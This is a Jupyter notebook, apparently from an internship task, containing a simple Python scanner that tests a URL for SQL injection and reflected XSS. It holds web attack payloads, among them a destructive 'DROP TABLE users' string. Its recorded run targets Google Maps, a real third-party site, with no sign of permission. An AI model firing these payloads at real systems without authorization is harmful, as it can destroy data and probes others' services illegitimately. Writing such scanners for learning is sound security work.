<a href="https://colab.research.google.com/github/sid-0837/CodeTech-IT-Solutions-Internship-Tasks/blob/main/intershiptask2.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [1]:
pip install requests beautifulsoup4


In [2]:
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

# Common SQL injection payloads
sql_payloads = ["' OR '1'='1", "'; DROP TABLE users; --", "' OR 1=1 --"]

# Common XSS payloads
xss_payloads = ['<script>alert("XSS")</script>', '" onmouseover="alert(1)"']

headers = {
    "User-Agent": "Mozilla/5.0 (VulnerabilityScanner)"
}

def is_vulnerable_to_sql(url):
    for payload in sql_payloads:
        new_url = url + payload
        response = requests.get(new_url, headers=headers)
        if "mysql" in response.text.lower() or "syntax error" in response.text.lower():
            return True
    return False

def is_vulnerable_to_xss(form, url):
    for payload in xss_payloads:
        form_details = get_form_details(form)
        data = {}
        for input_tag in form_details["inputs"]:
            if input_tag["type"] == "text":
                data[input_tag["name"]] = payload
            else:
                data[input_tag["name"]] = "test"

        if form_details["method"] == "post":
            res = requests.post(form_details["action"], data=data, headers=headers)
        else:
            res = requests.get(form_details["action"], params=data, headers=headers)

        if payload in res.text:
            return True
    return False

def get_all_forms(url):
    soup = BeautifulSoup(requests.get(url, headers=headers).content, "html.parser")
    return soup.find_all("form")

def get_form_details(form):
    details = {}
    action = form.attrs.get("action").lower()
    method = form.attrs.get("method", "get").lower()
    inputs = []
    for input_tag in form.find_all("input"):
        input_type = input_tag.attrs.get("type", "text")
        input_name = input_tag.attrs.get("name")
        inputs.append({"type": input_type, "name": input_name})
    details["action"] = action
    details["method"] = method
    details["inputs"] = inputs
    return details

def scan_url(url):
    print(f"\nScanning {url}")
    # Check for SQL Injection vulnerability
    print("[*] Checking SQL Injection...")
    if is_vulnerable_to_sql(url):
        print("[-] SQL Injection vulnerability found!")
    else:
        print("[+] No SQL Injection vulnerability found.")

    # Check for XSS in forms
    forms = get_all_forms(url)
    print(f"[*] Checking XSS on {len(forms)} forms...")
    for form in forms:
        if is_vulnerable_to_xss(form, url):
            print("[-] XSS vulnerability found in form!")
            break
    else:
        print("[+] No XSS vulnerability found in forms.")

# Entry Point
if __name__ == "__main__":
    target_url = input("Enter URL to scan (e.g., http://testphp.vulnweb.com): ")
    scan_url(target_url)


Enter URL to scan (e.g., http://testphp.vulnweb.com): https://www.google.com/maps

Scanning https://www.google.com/maps
[*] Checking SQL Injection...
[+] No SQL Injection vulnerability found.
[*] Checking XSS on 0 forms...
[+] No XSS vulnerability found in forms.
